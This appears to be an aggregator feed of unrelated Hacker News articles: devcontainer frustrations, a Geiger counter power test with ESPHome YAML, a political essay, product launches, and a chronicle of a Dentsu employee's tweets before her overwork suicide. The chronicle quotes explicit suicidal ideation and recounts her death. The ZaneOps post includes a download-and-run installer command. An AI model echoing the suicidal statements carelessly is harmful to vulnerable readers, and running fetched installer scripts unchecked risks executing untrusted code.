    Pulling Docker images can be pretty slow by itself, but the premise of devcontainers is that you can shove a bunch of logic into a script that runs and sets up the environment. So, in order to get going, you have to:

    1. Pull the base image (probably large if it’s something like Ubuntu)
    2. Run a bunch of scripts to install additional packages and do other setup

    Codespaces solves this (kind of) with their prebuild feature which packages 1 & 2 together as much as possible. Devcontainers doesn’t have that luxury, although what I tend to do is fake it by cramming as much as possible into the Docker container image and pushing it to the container registry. Then, when you start a devcontainer, it pulls the image rather than building a fresh copy2. Still not ideal, but faster.

    Hell is Other Peoples’ Computers

    All of this is manageable… extremely annoying at times, but manageable - if you’re comfortable getting your hands dirty. My biggest mistake with devcontainers is trying to use them for projects where people without a lot of experience in this area are regularly contributing. There are so many places where things could go wrong:

    • Docker might not be set up correctly, and it might not be telling you what’s wrong
    • Maybe Docker works, but VS Code repeatedly fails to build or run the image (this happens often to me without a clear explanation)
    • The container starts, but it can’t be accessed by VS Code
    • The devcontainer starts properly, but one of the sidecar containers (eg. the database) died for some reason
    • Wait, how do I access one of the sidecar containers? Instructions unclear, built a toaster
    • Something broke for no clear reason. What layer is it in? If I’m helping someone, how do I tell them what to check?
    • If you have an ARM-based machine (M1+ Mac), I don’t even know what’s going to happen

    Debugging issues with the whole stack across a variety of computers, remotely, is leading me away from devcontainers and towards good old fashioned virtual machines. Vagrant can get me most of the way there for every platform that matters (ie. I can tell people “just install VirtualBox”) and it seems like there is less to go wrong.

    The Promised Land

    I dream of a day when a one-click development environment is a reality, and this is so close, but it’s not there for complicated projects yet. For simple projects, I likely will continue to use devcontainers, but with extremely conservative options that minimize the dependency on their specific quirks.


    1. x86, not M1/M2+
    2. Building a fresh copy of the image also requires a functional Docker setup, and, well…
    ]]>
    https://www.mitchellrysavy.com/blog/2025/02/26/devcontainers.html hacker-news-small-sites-43194169 Thu, 27 Feb 2025 13:26:26 GMT
    <![CDATA[Matsuri's Grown-Up World – a first-person chronicle of a karoshi death]]> thread link) | @mrcgnc
    February 27, 2025 | https://aethermug.com/posts/matsuri-s-grown-up-world | archive.org

    April 2015: Matsuri Takahashi, fresh out of the most prestigious university in Japan, begins her first job at Dentsu, a major advertising company.

    Takahashi on her graduation day in March 2015. Photo by her mother, Yukimi Takahashi.
    Takahashi on her graduation day in March 2015. Photo by her mother, Yukimi Takahashi.

    These are some of her tweets from the following months (all emphasis mine).

    Tweeted at

    12:41 PM, May 30, 2015 (Saturday)

    Love weekends so much

    Tweeted at

    12:39 AM, September 9 (Wednesday)

    Leaving work now, I'm wrecked

    Tweeted at

    12:41 AM, September 9 (Wednesday)

    A proper junior employee should virtuously hang on until the last train of the day...

    Tweeted at

    8:22 AM, September 26 (Saturday)

    This is too intense, it's getting way too painful...

    Tweeted at

    9:59 AM, October 1 (Thursday)

    While new hires are attending their job offer ceremony with dreams of a bright future, second-year employees are ironically at the clinic on the same floor for health checkups as "people requiring management." New hires, this is what society is like.

    Tweeted at

    9:11 PM, October 2 (Friday)

    It's so hard, I think being a new employee isn't fun at all as I go to work, come home on the last train, sleep without removing my makeup, wake up without even being able to talk to friends, every day. But it was really healing when I went to Ginza with a coworker from my cohort for a small work errand, and we walked and said "I can smell osmanthus flowers, autumn is nice."

    Tweeted at

    6:13 PM, October 3 (Saturday)

    Working is just too painful.

    Tweeted at

    11:35 PM, October 4 (Sunday)

    Dear God, I don't want to go to work.

    Tweeted at

    11:39 PM, October 4 (Sunday)

    I was so full of life during my student days, and now look what's happened to me. "A member of society"...

    Tweeted at

    11:55 PM, October 4 (Sunday)

    "You've worked hard for six months, now you don't have to work anymore" — I wish some rich 50-year-old divorced man who thinks like that (balding is fine) would propose to me so I could become a housewife and live like a pet. Even though I graduated from Tokyo University.

    Tweeted at

    10:08 PM, October 6 (Tuesday)

    Are there any new employees who don't get mentally ill? I can't tell...

    Tweeted at

    11:30 PM, October 7 (Wednesday)

    I want to meet at a small bistro around Higashi-Ginza around 9 PM, drink well-chilled white wine while complaining "Work is tough—I hate it," and have a kind, smart boyfriend who nods and says "I know" while giving advice and a bit of scolding, but also says "Worst case, it's okay to quit." Since I have no other goal than to be proposed to by such a person, I have nothing to tell the department head during my evaluation interview.

    Tweeted at

    11:31 PM, October 7 (Wednesday)

    It's still only Wednesday?

    Tweeted at

    11:20 PM, October 12 (Monday)

    Came to work on a holiday thinking I was being diligent, but 60% of our department was already there. No wonder people die from overwork.

    Tweeted at

    1:28 AM, October 13 (Tuesday)

    I'm going to take a bath now and then head to the office ( ・ᴗ・̥̥̥ ) death

    Tweeted at

    12:03 AM, October 15 (Thursday)

    When everyone else is leaving at 4 AM or pulling all-nighters, there's an atmosphere where new employees can't say they're sleepy or tired. I'll be the type who feels guilty about escaping even during a fire or earthquake, and will die clinging to my PC until the end.

    Tweeted at

    3:28 AM, October 20 (Tuesday)

    Cause of death: "tough love" from the boss

    Tweeted at

    3:41 AM, October 21 (Wednesday)

    Made it home...

    Tweeted at

    5:24 PM, October 21 (Wednesday)

    State of emergency #1 has been declared, registered on a job search site.

    Tweeted at

    11:21 PM, October 22 (Thursday)

    Recently I've been working 19 hours straight, lunch is either at my desk from a convenience store or I skip it altogether ( ´- ̥̥̥ω- ̥̥̥` )

    Tweeted at

    11:26 PM, October 22 (Thursday)

    I'm tired of only talking to people from work every day...

    Tweeted at

    4:36 PM, October 25 (Sunday)

    Even with the worst feelings after breaking up with my boyfriend, it's comforting to know that endless work awaits me at the office.

    Good thing I have such a tough job.

    Tweeted at

    8:56 PM, October 28 (Wednesday)

    I was told the document I made over two consecutive all-nighters was completely useless, but then he said if I fix it we might take it to the client, and now I'm motivated enough to work on weekends. I have an abundance of corporate slave talent.

    Tweeted at

    12:00 AM, October 29 (Thursday)

    Thanks to overtime pay, my 7th month salary is 1.5 times my starting salary! 🎊 Overwhelming growth 🙌�😊💕

    Tweeted at

    9:48 PM, October 29 (Thursday)

    I broke the village-like company rule that "the seniority wall is deeper than the ocean" by speaking too casually to a slightly senior colleague and incurred their anger, damaging my mental state again.

    Tweeted at

    7:58 AM, October 31 (Saturday)

    Department head: "Your 20 hours of overtime is a waste for the company," "Looking sleepy during meetings shows you can't manage yourself," "Don't come to work with messy hair and bloodshot eyes," "If you're struggling with the current workload, your capacity is too small."

    Me: "Bloodshot eyes aren't allowed either?"

    Tweeted at

    10:53 PM, October 31 (Saturday)

    I mean, even first-class professionals can't control their blood vessel constriction.

    Tweeted at

    3:23 PM, November 1 (Sunday)

    I don't want to go to work. I wish we had two-day weekends (><)

    Tweeted at

    8:22 PM, November 3 (Tuesday)

    When you can't tell if you're working to live or living to work, that's when real life begins.

    Tweeted at

    11:59 PM, November 5 (Thursday)

    I'm even using Twitter to collect evidence for when I sue the company after quitting.

    Tweeted at

    11:58 PM, November 12 (Thursday)

    I thought I could keep going, but I broke down unexpectedly early and now I hate myself.

    Tweeted at

    12:34 AM, November 13 (Friday)

    Miraculous return to society. Phew

    Tweeted at

    1:12 AM, November 15 (Sunday)

    What I want to tell job-hunting students is that work is not like fun activities or part-time jobs—it's "labor" that continues for life, and if it doesn't suit you, your mental and physical strength may wear down every day.

    Tweeted at

    8:32 AM, November 18 (Wednesday)

    I absolutely hate waking up in the morning.

    Tweeted at

    7:20 AM, November 20 (Friday)

    I managed to wake up again today...
    The difficulty level will increase even more with the new season.

    Tweeted at

    7:21 AM, December 3 (Thursday)

    It's not that I don't want to work, I just don't want to wake up in the morning.

    Tweeted at

    8:42 PM, December 8 (Tuesday)

    Shit! Hey, I'm heading to the office like a salmon swimming upstream to spawn!

    Tweeted at

    4:06 AM, December 9 (Wednesday)

    I'm heading home now, but no matter how I calculate it, there's not enough time?

    When I have to do things I'm not good at, I become way too inefficient...

    Tweeted at

    5:39 AM, December 11 (Friday)

    Heading home now (T ^ T)

    Tweeted at

    3:10 PM, December 12 (Saturday)

    Since all my cohort is coming to work on Saturday, I can go to work happily!

    Tweeted at

    12:40 AM, December 14 (Monday)

    I hope I can get married and quit my job as soon as possible.

    Tweeted at

    11:18 PM, December 15 (Tuesday)

    A "good job" from my favorite senior - priceless

    Tweeted at

    9:41 PM, December 16 (Wednesday)

    Getting to leave before 10 PM... it's a miracle

    Tweeted at

    9:48 PM, December 16 (Wednesday)

    I wonder what will remain after overcoming such stressful days while constantly wanting to die.

    Tweeted at

    12:04 AM, December 17 (Thursday)

    My eyes are dying, my heart is dying, and I even thought I might be better off dead, so today I was considering who would be the best lineup to CC on my suicide note email.

    Tweeted at

    7:37 PM, December 17 (Thursday)

    Senior~! Please stop praising me properly when I do well and gently scolding me when I mess up~(><) Stop becoming my only ray of hope in these painful days~(><) At this rate I might fall for you~(><)

    Tweeted at

    4:01 AM, December 18 (Friday)

    When you're at the company for 20 hours a day, you start to lose track of what you're even living for and just laugh.

    Tweeted at

    3:55 PM, December 20 (Sunday)

    Even though I finally get to see my boyfriend after 4 months, it's incredibly stressful having to finish work super quickly for that and feeling pressured not to complain. Being a working adult means never being able to let your guard down for a moment.

    Tweeted at

    5:54 PM, December 20 (Sunday)

    Being told by male bosses that I lack femininity or whatever, even if it's meant as a joke to get laughs, is my limit of patience. It's unfair that men don't get told they lack masculinity when they go bald. So depressing.

    On the morning of Christmas Day, 2015, Matsuri Takahashi threw herself from her company dormitory and died at the age of 24. She had been working for 9 months, doing an estimated 130 monthly hours of overtime.

    According to her mother, Matsuri was well aware that excessive work could lead to death, but she still couldn't quit her job.

    (I started this post with the intention of making a point about something, but rereading this story broke my heart all over again and it's difficult to pick up from here. I think it's enough for today.) â—�

    Note: Matsuri Takahashi's Twitter account in Japanese can be found here.

    Cover image:

    Photo by Ian Keefe, Unsplash

    ]]>
    https://aethermug.com/posts/matsuri-s-grown-up-world hacker-news-small-sites-43193980 Thu, 27 Feb 2025 12:59:00 GMT
    <![CDATA[Testing of energy consumption by Geiger counter GGreg20_V3]]> thread link) | @iotdevicesdev
    February 27, 2025 | https://iot-devices.com.ua/en/ggreg20_v3-geiger-counter-energy-consumption-testing/ | archive.org

    Our company has conducted a thorough testing of the power consumption of the Geiger counter module GGreg20_V3, intended for use in DIY projects. The purpose of the study was to determine the real power consumption of the module at different supply voltages: 3.3V, 3.7V, 5.0V.

    GGreg20_V3 Energy Consumption Testing

    To conduct the measurements, we developed a special test bench based on the Home Assistant platform. The central element of the system was the Raspberry Pi Pico W controller with ESPHome firmware, which controlled the operation of the GGreg20_V3 module. To accurately measure the energy consumption, we used an INA219 sensor connected to a NodeMCU/ESP8266 controller also running ESPHome firmware. We used a laboratory power supply as a power source for the GGreg20_V3, which set the exact voltage level during testing.

    Since the GGreg20_V3 module supports a wide range of supply voltages, from at least 3.0V to 5.5V, we used the three most common supply voltage levels to show how the test result differs: 3.3V, 3.7V, 5.0V. These voltages give us an idea of the module’s consumption when powered by:

    • another controller or source with a voltage of 3.3V;
    • a 3.7V lithium battery;
    • another controller or source with a voltage of 5V.

    It is important to note that the INA219 sensor measured only the power consumption of the GGreg20_V3 module, while the controllers were powered separately. This allowed us to obtain the most accurate data.

    Also note that the supply voltage level did not change over time during the 60-minute test. Therefore, you should not expect that we have performed a complete emulation, for example, of a lithium battery that discharges under load and, accordingly, loses voltage from 4.2V to 2.5V during the test. Although this would have been a really useful and interesting experiment, we decided not to bother with it that much.

    GGreg20_v3 energy consumption test lab structure 2025-02-25
    ComponentPurposePower supplyFirmware / Interface
    GGreg20_V3The object of study of energy consumption;
    Measurement of radiation level
    via INA219 from the laboratory power supply– / GPIO output, Active-Low
    Raspberry Pi Pico WReceiving data from the GGreg20_V3 module and transferring it to the Home Assistant serverUSBESPHome with configuration for GGreg20_V3 as sensor / WiFi wireless connection
    INA219Measurement of current consumption by the GGreg20_V3 modulefrom the laboratory power supply unit– / I2C
    NodeMCU ESP8266
    (or ESP12_OLED)
    Controlling the INA219 module, receiving measurement data, and transmitting it to the Home Assistant serverUSBESPHome with configuration for INA919 as sensor / WiFi wireless connection
    Lab power supply unitSupply the INA219 and GGreg20_V3 sensor modules with the set voltage220V power mainsDC output 3.3V, 3.7V, 5.0V.
    Home Assistant serverEnables data transfer between devices via WiFi;
    Collection, processing and visualization of measurement data
    220V power mainswireless WiFi connection

    Software on the side of the measuring sensor of consumed electric energy based on ESP8266 + INA219 with ESPHome firmware:

    sensor:
      - platform: ina219
        address: 0x40
        shunt_resistance: 0.1 ohm
    
        current:
          name: "INA219 Current"
          accuracy_decimals: 5
          id: current_value
    
        power:
          name: "INA219 Power"
          accuracy_decimals: 5
          id: power_value
    
        bus_voltage:
          name: "INA219 Bus Voltage"
          accuracy_decimals: 5
    
        shunt_voltage:
          name: "INA219 Shunt Voltage"
          accuracy_decimals: 5
    
        max_voltage: 32.0V
        max_current: 3.2A
        update_interval: 1min
    
      - platform: integration
        name: "Total Energy Consumed"
        id: total_energy
        sensor: power_value
        time_unit: min
        accuracy_decimals: 5
        unit_of_measurement: "Wh"
        filters:
          - multiply: 0.0166666666666667
    
      - platform: integration
        name: "Total Current Consumed"
        id: total_current
        sensor: current_value
        time_unit: min
        accuracy_decimals: 5
        unit_of_measurement: "Ah"
        filters:
          - multiply: 0.0166666666666667
    

    This YAML configuration snippet provides all the necessary data for our planned testing of the GGreg20_V3 radiation sensor module in terms of power consumption during operation under normal background radiation conditions.

    The power consumption was measured every minute, with data accumulated for previous periods. The test lasted for an hour, which allowed us to obtain the real consumption of the GGreg20_V3 module for 60 minutes for each of the three supply voltages.

    The Home Assistant platform was used to collect and record sensor data. It also provided tools for creating visual graphs of electricity consumption.

    Thanks to the testing, we have obtained detailed data on the power consumption of the GGreg20_V3 module at different supply voltages. These results allow users to optimize the power consumption of their DIY projects using this module.

    Power supply with a voltage of 3.3V

    ggreg20_v3_at_3V3_energy_consumption_test_1hour_with_buzzer_2023-08-29
    ggreg20_v3_at_3V3_energy_consumption_test_1hour_with_buzzer_graph_2023-08-29

    Power supply with a voltage of 3.7V

    ggreg20_v3_at_3_7V_energy_consumption_test_1hour_with_buzzer_2023-08-30
    ggreg20_v3_at_3_7V_energy_consumption_test_1hour_with_buzzer_graph_2023-08-30

    Power supply with a voltage of 5.0V

    ggreg20_v3_at_5V_energy_consumption_test_1hour_with_buzzer_2023-08-31
    ggreg20_v3_at_5V_energy_consumption_test_1hour_with_buzzer_graph_2023-08-31

    Summary of results

    The power consumption of the GGreg20_V3 module was tested for 60 minutes at different voltages under normal conditions. INA219 measurement update cycle: 1 minute

    5 Volts3.7 Volts3.3 Volts
    Output voltage of the laboratory PSU, V 5,113,833,45
    Supply voltage of the GGreg20_V3 (on the INA219 sensor), V5,013,73,32
    Power consumption during the test (LED blinks, buzzer beeps), A*h0,035230,051740,05741
    Instantaneous current at rest, A0,03430,048800,05664
    Peak bursts of instantaneous current (blink & beep, duration 10 ms), A0,0510,0640,093

    Test dates: 27.08. – 31.08.2023

    No deviations in radiation level measurements were observed during testing

    Testing was performed in the default settings of the GGreg20_V3 module. The buzzer is enabled. The Schottky protection diode is installed. Blue power supply LED lights constantly. The supply voltage remained unchanged throughout the test cycle.

    Appendix. Theoretical battery discharge diagram

    We also decided to show the theoretical discharge graph at three different voltages when the GGreg20_V3 module is powered by batteries of different chemistry and capacity.

    The basis for our calculations was the battery characteristics available on the Internet:

    Battery voltage levelBattery assemblyExample of a rechargeable battery
    3.2V1 хSoshine 18650 1800 mAh LiFePO4 3,2В
    3.7V1 хSony 18650 VTC6 3.7V 3120 mAh (30А)
    4.8V4 х in seriesVidex NiMH AA HR6 1.2V 2100 mAh

    However, please note once again that this graph is a theoretical assumption and does not take into account the discharge of real batteries under load over time and changes in voltage and current consumption during discharge.

    Estimated battery lifetime under normal background conditions (20-40 CPM) with alarming

    The Geiger counter module GGreg20_V3 manufactured by IoT-devices, LLC is the company’s flagship product, which has found its users in more than 30 countries.

    All over the world, radio amateurs use GGreg20_V3 to create their own DIY projects, learn and conduct experiments related to radiation measurement.

    When developing this product and improving it since 2020, we tried to make the module compact, ready-to-use, compatible with as many DIY platforms and systems as possible, undemanding in terms of power supply voltages, easy to program, and harmonized in terms of operating characteristics with various Geiger tubes.

    We have also developed a number of examples and posted them on GitHub for various hardware and software platforms such as Arduino UNO, ESP32, ESP8266, Raspberry Pi Pico W, NodeMCU, ESPHome, Tasmota, MicroPython, Home Assistant.

    And we, at IoT-devices Company, hope that our Customers will have a great user experience and real pleasure by implementing this module in their projects.

    We also thank everyone for supporting and choosing this product designed and manufactured in Ukraine. We really appreciate it!

    Geiger counter

    GGreg20_V3

    Testing of energy consumption

    DIY-projects

    Home Assistant

    Raspberry Pi Pico W

    ESPHome

    INA219

    NodeMCU

    ESP8266

    I2C

    WiFi

    YAML

    ]]>
    https://iot-devices.com.ua/en/ggreg20_v3-geiger-counter-energy-consumption-testing/ hacker-news-small-sites-43193780 Thu, 27 Feb 2025 12:30:59 GMT
    <![CDATA[Thoughts for Inauguration Day]]> thread link) | @maxerickson
    February 27, 2025 | https://www.eatingpolicy.com/p/thoughts-for-inauguration-day | archive.org

    On inauguration day 2017, I wrote this:

    Most importantly, remember, the status quo isn’t worth protecting. It’s so easy to be in reaction, on the defensive, fighting for the world we had yesterday.

    Eight years later, the status quo still isn’t worth protecting. I know that’s quite a blanket statement, and yes, I think things like the independence of the civil service and democracy are worth protecting, and yes, I worry about both. But we have to grapple a lot more honestly with why so many people voted for massive, disruptive change, even potentially at the cost of the core principles and values we are supposed to hold dear. Take, for instance, the rule of law.

    In The New York Times a few weeks ago, Stephen E. Hanson and Jeffrey S. Kopstein characterize the incoming administration’s patrimonialism (rule through personal power and patronage) as “an assault on the modern state as we know it.” Noting that Trump won the presidential election fairly, they correctly assess that reversing this assault “will require more than a simple defense of ‘democracy.’ …The threat we face is different, and perhaps even more critical: a world in which the rule of law has given way entirely to the rule of men.”

    I agree. The rule of men is fundamentally inconsistent with the principles and values of our nation, and I do not welcome any nepotism, graft, or abuse of the system for retribution that may be coming our way. But why would half of voters tolerate this? The authors propose that “a slew of self-aggrandizing leaders has taken advantage of rising inequality, cultural conflicts and changing demography to grab power,” suggesting that the rule of law is a hapless casualty of other circumstances. But the principle of a nation governed by laws not men should have been non-negotiable. It should have been a crown jewel of our democracy for which all else could be tolerated. It wasn’t. The crown jewel was tarnished, and unless we understand the nature of that tarnish, we have little hope of returning that jewel to its rightful place.

    It’s not particularly insightful to point out that if you feel the system is rigged, and the rule of law enforces that rigged system, you are unlikely to defend it. Rising inequality, as the authors suggest, does lead more and more people to conclude just that. There is a strong sense that the elite get away with murder while the poor do time for too many parking tickets.

    But you don’t have to feel that the system is fundamentally rigged against you personally to entertain the possible benefits of “the rule of men,” or perhaps we could just say people. The reality is that people are frustrated with a system in which it feels like laws — a complex, tangled, often contradictory, seemingly arbitrary web of rules that most people don’t understand — dictate outcomes at the expense of reasonable human judgement. Philip Howard provides an endless stream of examples of rules winning out when common sense could have prevailed, like the homeless shelter in New York that couldn’t be built without installing a prohibitively expensive elevator, despite the fact that only the first floor was to be used, or the public school custodian who, despite being perfectly capable of fixing the broken window, instead had to file paperwork to order union labor to do so, leaving the window broken for months while the paperwork made its way through the bureaucracy and a team could be assigned. These aren’t edge cases. They are just the routine results of what Dan Davies calls the unaccountability machine, in his excellent book of the same name. Rule by people would allow for judgement, for just fixing the window. Rule by law leaves the cold air freezing the students while costs spiral.

    When Biden took power back from Trump in 2021, there was enormous relief among lawyers in government. I know of one agency in which the mere statement “we will respect the rule of law,” spoken that first day of the Biden administration, elicited tears from otherwise buttoned-up bureaucrats. It’s entirely understandable, even touching, given the chaos that had ensued at that agency. But what followed during the next four years, across a Democratically-led federal government, was a retreat to the safety of process and procedure. It felt good and right after the lawlessness of the Trump years to luxuriate in its antidote.

    But there is a cost to that refuge. Quinta Jurecic, also writing in the Times, describes the cost to the Department of Justice, whose leadership under Biden vowed to hold Trump accountable for the January 6th assault on the Capitol, and failed to do so, in part because of how slowly it moved. She writes:

    The department did not dawdle quite so much as its fiercest critics argue. Still, if the goal in moving slowly was to turn down the political temperature, this seems in hindsight to have had the opposite effect. In explaining his thinking, [Attorney General Merrick] Garland said that “the best way to ensure the department’s independence, integrity and fair application of our laws” is to have “a set of norms to govern our work.” Protecting the rule of law, it turns out, requires more than maintaining the Justice Department’s own internal processes.…

    After all, for the average person not steeped in Justice Department traditions, the first Trump administration’s model of law enforcement as a system of patronage — with preferential treatment apparently given to allies of the president — might seem appealing when compared with a plodding, opaque, rule-bound bureaucracy that nevertheless reliably manages to advantage those in power.

    Those tears of relief in 2021 have turned to tears of despair in 2025. Process and procedure do not, it turns out, ensure just outcomes.

    Share

    The Supreme Court is also not helping the reputation of the law. This SCOTUS is happy to put finicky procedural objections over substance when it serves them. Take Ohio vs EPA, in which the conservative majority (minus Amy Coney Barrett, thankfully) sided with states complaining about a new rule seeking to prevent upwind states from polluting the air of downwind states. Perhaps these justices just don’t want the EPA to be regulating at all, but they didn’t justify their decision on the basis of cost-benefit or anything like that. Notice and comment rule-making requires agencies to respond to comments from the states and industry groups that opposed the rule, in this case more than 1,100 highly technical comments. The EPA did this, but the court decided in the states’ favor because the EPA didn’t address one of the criticisms at the level of detail that the Supreme Court wanted to see.

    In other words, SCOTUS is not saying EPA shouldn't protect downwind states from the pollution of their neighbors. The court is saying that EPA should be more thorough in complying with procedure, even when that procedure is clearly weaponized by industry groups, who, as Nicholas Bagley writes, “carpet-bomb agencies with thousands of pages of comments, many of which contain unstructured technical information.” Nick continues: “The EPA’s sin, if there was one, was failing to adequately respond to a single oblique comment that it received.” Whatever you think about agency regulation — and I believe that agencies certainly do overreach and regulate badly at times — it’s still a bad look for the highest court in the land to put such a technicality over reasonable judgement.

    What this kind of thing tells everyone — on the right and the left, elites and the working class — is that the rule of law is easily twisted by those in power to justify whatever it is they want to do.

    That’s what the law has become for so many people. It’s not a blindfolded Lady Justice demonstrating impartiality and reasonableness, it’s a game of gotcha. I’ve ranted at length before about how public servants trying to deliver on the promises of our laws and policies are thwarted by the weaponization of the complexities of other laws, being told over and over again that the perfectly reasonable things they want to do to perform their jobs are illegal. Hanson and Kopstein believe that Trump represents “an assault on the modern state as we know it,” without acknowledging why the modern state might merit an assault.

    Assaults hurt. I am currently engaged in an assault on my own body, and it is deeply unpleasant. Every three weeks now, I sit in a small room and let a nurse drip harsh chemicals into my bloodstream. The last time I did it, one of the chemicals burned so badly you can see my bruised and hardened vein through the skin. The week following I’m sick as my body tries to rid itself of their toxic effects, hopefully taking whatever cancer cells may have been floating around with them.

    I’m not enjoying this, but the alternative is a highly likely return of cancer. If it returns, it will probably land in my bones, and it will be incurable. Chemo kills fast-growing cells, including healthy white blood cells in the bone marrow. Right now, ten days after a treatment, I’m highly vulnerable to infection. It’s the opposite of health, in the service of health. There are no guarantees, but this assault on my system gives me far better odds of living a normal, healthy life in the long run. Like every cancer patient, I vow to be healthier than ever when this is over. I’m done with alcohol. I’ll never skip another workout. There’s nothing like losing your health to make you treasure it.

    Cancer has been my metaphor before. The unchecked growth of policy, process, and procedure that compounds over time and strangles our government’s ability to act in the public interest is much like a cancer. When I wrote that, I believed my cancer would be excised with surgery and that would be it. Now chemo is my metaphor. It seems we may go through some scary and even dangerous changes. But I believe there is something better on the other side of this for our country, too.

    Here’s more of what I wrote eight years ago:

    Most importantly, remember, the status quo isn’t worth protecting. It’s so easy to be in reaction, on the defensive, fighting for the world we had yesterday. Fight for something better, something we haven’t seen yet, something you have to invent. Find a thousand collaborators. Include people you disagree with. Meet division with imagination.

    Here’s what I have to say today. I believe those last two bits even more than I did then. Our job now is to be changed, to reflect, to become better. We can’t do that without disagreement, without the imagination that comes from engaging across division. When we come out the other side of this, Dems can’t be who we are today. We can’t retreat again into a procedure fetish that serves no one, to start. Hell, the public isn’t putting us back in power if that’s our plan. We must find a new way.

    Discussion about this post

    ]]>
    https://www.eatingpolicy.com/p/thoughts-for-inauguration-day hacker-news-small-sites-43193730 Thu, 27 Feb 2025 12:25:22 GMT
    <![CDATA[Show HN: ZaneOps, a self-hosted alternative to Vercel, Heroku and Render]]> thread link) | @fredkisss
    February 27, 2025 | https://zaneops.dev/changelog/announcing-v1/ | archive.org

    ZaneOps - Deploy and manage your apps, own your data | Product Hunt


    ZaneOps v1.0 is finally here!

    ZaneOps is a beautiful, self-hosted, open-source platform for hosting static sites, web apps, databases, services (like Umami, WordPress, Supabase), workers, or anything else you need—whether you’re launching a startup or managing an enterprise.

    Today, ZaneOps is stable and production-ready.

    Install ZaneOps

    Installation steps are detailled on the installation page, but here is the TLDR:

    # create directory to install zaneops

    mkdir -p /var/www/zaneops && cd /var/www/zaneops

    # download zaneops CLI

    curl https://cdn.zaneops.dev/makefile > Makefile

    # setup zaneops

    make setup

    # start zaneops app

    make deploy

    Why ZaneOps exists ?

    The goal of ZaneOps is to bring together the best features we could steal take inspiration from popular platforms like Vercel, Railway, and Render, while giving you full ownership of your data and complete control over your server costs.

    Features

    Deploying Services from Docker Images

    Environment Variables Management

    Supports adding single variables:

    And importing variables from .env files:

    Advanced URL Management

    Supports wildcard domains:

    Generates default URLs for services:

    Allows multiple services to share the same domain:

    Multiple services sharing the same domain

    Persistent Logs

    Application logs are persisted per deployment:

    HTTP logs are persisted per deployment and per service:

    Monitoring

    Provides metrics per service and deployment:

    Git-Like Configuration Changes

    Allows you to review changes before deploying:

    Resource Limits

    Magic File Mounts

    Override the content of any file within your services or add new files required for configuration:

    Deployment Webhook URLs

    Easily set up a CI/CD workflow:

    OK, I Like What I See 😍

    If you’d like to start using ZaneOps today, follow the installation steps.

    You can also check out our tutorial on deploying a React Router SSR app on ZaneOps.

    What’s Next?

    V1.0 is just the beginning! We have exciting features planned, including:

    • Git-based deployments with GitHub integration and pull request preview environments
    • Multi-server support with multiple replicas per service
    • Automated backups for databases and other services

    We’re just getting started, and we’d love for you to join us on this journey.

    If you’ve made it this far, we have a small favor to ask: Please, give us a star on GitHub! ⭐ It’s one of the easiest ways to support the project. You can also help by resharing this post and spreading the word about ZaneOps.

    Thank you! 🫶

    ]]>
    https://zaneops.dev/changelog/announcing-v1/ hacker-news-small-sites-43193639 Thu, 27 Feb 2025 12:14:02 GMT
    <![CDATA[Show HN: YepCode Run – Perfect for Running AI-Generated Code in Secure Sandboxes]]> thread link) | @mmuino
    February 27, 2025 | https://yepcode.io/run | archive.org

    🎯 What is this?

    Built on top of YepCode, it allows you to execute code without any setup or installation. Perfect for:

    • 🤖

      Execute AI-generated code - Securely in an sanboxing environment to support fully autonomous AI agents.

    • 📦

      Package Exploration - Try npm or pypi packages without installing them locally

    • 🔄

      Code Sharing - Share runnable code examples with others

    • 🧪

      Quick Prototyping - Test snippets and algorithms on the fly

    Just write or paste your code, and we'll handle all needed setup! 🤙

    🤔 Why YepCode Run?

    Running arbitrary code in production environments presents significant challenges around security, scalability, and infrastructure management.

    This is especially critical when dealing with AI-generated code from LLMs. We provide an enterprise-grade sandboxing and security measures out of the box - allowing you to focus on your code instead of infrastructure concerns.

    📂 Example Templates

    ]]>
    https://yepcode.io/run hacker-news-small-sites-43193542 Thu, 27 Feb 2025 12:00:22 GMT
    <![CDATA[Show HN: No-html.club, a plain text club]]> thread link) | @dominicq
    February 27, 2025 | http://no-html.club/index.txt | archive.org

    Unable to extract article]]>
    http://no-html.club/index.txt hacker-news-small-sites-43193383 Thu, 27 Feb 2025 11:28:56 GMT
    <![CDATA[Service as a Software]]> thread link) | @georgestrakhov
    February 27, 2025 | https://www.uxtigers.com/post/service-as-software | archive.org

    Summary: Over the upcoming decade, AI-provisioned intelligence will become almost free, and instantly available. AI won’t just assist professionals — it will take over much of the work as a packed instant service provider. Welcome to the age of boundless skill scalability, where services transform into software and economies grow beyond human imagination.

    Imagine a world where professional expertise is a few clicks away—faster, smarter, and unbelievably affordable. This isn’t science fiction; it’s the next revolution in SaaS. AI becomes your consultant, designer, and researcher, redefining what’s possible in every corner of work. This will create a new model for service design, where services that used to be provided by humans are packaged up and delivered by software. We can call this “Service as a Software”, reusing the acronym SaaS that has long been used for “Software as a Service.”

    (Watch the jazz music video I made based on this article. YouTube, 2 min.)

    Software as a Service (the original SaaS) is a cloud computing model in which software applications are hosted by providers and delivered to users over the Internet on a subscription basis, eliminating the need for local installation and maintenance.